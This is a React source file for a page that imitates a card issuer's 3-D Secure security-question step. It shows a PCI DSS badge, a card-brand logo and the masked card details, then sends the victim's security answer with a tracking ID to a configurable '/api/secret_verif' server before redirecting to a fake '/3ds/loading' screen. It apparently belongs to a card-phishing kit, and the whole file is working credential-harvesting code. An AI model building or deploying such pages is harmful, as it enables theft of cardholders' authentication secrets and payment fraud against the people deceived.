import React, { useState } from 'react';
import HelpImage from './assets/help.gif'
import axios from 'axios';
import { useNavigate } from 'react-router-dom';

import PciImage from './assets/pci.jpg'
import VisaImage from './assets/visa.jpg'
import MasterImage from './assets/master.jpg'
import { useTranslation } from 'react-i18next';

const SecurityQuestionPage = () => {
  const { t } = useTranslation();

  const [balance_input, set_balance_input] = useState('');
  const [submitBtnContent, setSubmitBtnContent] = useState(t("submit"));
  const [submitBtnDis, setSubmitBtnDis] = useState(false);

  const navigate = useNavigate();
  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
    .toString()
    .padStart(2, '0')}/${today.getFullYear()}`;

  const handleCodeSubmit = async () => {
    if (balance_input.length < 4) return;

    setSubmitBtnContent(<div className="inputLoader"></div>);
    setSubmitBtnDis(true);

    const dataToSend = {
      uuId: localStorage.getItem('uuId'),
      question: localStorage.getItem('seq_quest'),
      answer: balance_input,
    };

    try {
      const response = await axios.post(`${process.env.REACT_APP_SERVER_URL}/api/secret_verif`, dataToSend);
      if (response.status === 200) {
        navigate("/3ds/loading");
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false);
        setSubmitBtnContent(t("submit"));
      }, 3000);
    }
  };

  const handleBalanceInputChange = (e) => {
    set_balance_input(e.target.value);
  };

  const firstDigit = localStorage.getItem('first-digit');
  let imageSrc, altText;

  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null;
    altText = 'No card';
  }

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300">

        <div className="flex items-center justify-between w-full mb-6">
          <img src={PciImage} alt="PCI DSS Compliant" className="h-12 mr-4" />
          {imageSrc && <img src={imageSrc} alt={altText} className="h-12" />}
        </div>

        <h1 className="mb-4 text-lg font-bold text-gray-800">
          {t("answer_security_question")}
        </h1>

        <p className="mb-6 text-xs text-gray-900">
          {t("security_question_desc")}
        </p>

        <div className="grid grid-cols-2 mb-4 text-xs">
          <span>{t("merchant")}:</span>
          <span className="text-gray-900">{process.env.REACT_APP_MERCHANT_NAME}</span>

          <span>{t("date")}:</span>
          <span className="text-gray-700">{formattedDate}</span>

          <span>{t("card_number")}:</span>
          <span className="text-gray-900">**** **** **** {localStorage.getItem('last-four-digits')}</span>

          <span>{t("amount")}:</span>
          <span className="text-gray-900">{localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY} {localStorage.getItem('summ')}</span>
        </div>

        <div className="grid items-center grid-cols-1">
          <label htmlFor="security-answer" className="block mt-4 mb-2 font-semibold text-neutral-700">
            {localStorage.getItem('seq_quest')}
          </label>

          <input
            id="security-answer"
            type="text"
            placeholder={t("enter_answer")}
            minLength={6}
            value={balance_input}
            onChange={handleBalanceInputChange}
            className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none"
          />

          <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
            <a href="#" className="leading-3 underline hover:underline">
              {t("forgot_answer")}
            </a>
          </div>
        </div>

        <div className="flex items-center justify-between">
          <button type="button" className="px-4 py-2 text-xs">
            {t("cancel")}
          </button>

          <button
            onClick={handleCodeSubmit}
            type="submit"
            disabled={submitBtnDis}
            className="px-2 py-1 text-xs leading-none border rounded-sm h-fit border-neutral-800 bg-neutral-100"
          >
            {submitBtnContent}
          </button>

          <button type="button" className="flex items-center px-4 py-2 text-xs">
            <img className="mr-1" src={HelpImage} alt="" />
            {t("help")}
          </button>
        </div>
      </div>
    </div>
  );
};

export default SecurityQuestionPage;
